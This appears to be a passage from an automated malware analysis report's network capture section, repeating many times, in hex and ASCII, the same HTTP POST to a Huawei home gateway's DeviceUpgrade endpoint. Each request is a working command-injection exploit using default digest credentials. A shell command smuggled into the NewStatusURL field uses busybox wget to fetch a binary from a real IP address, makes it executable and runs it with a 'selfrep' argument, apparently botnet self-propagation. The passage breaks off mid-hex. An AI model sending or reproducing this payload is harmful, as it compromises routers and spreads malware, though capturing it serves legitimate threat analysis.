67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 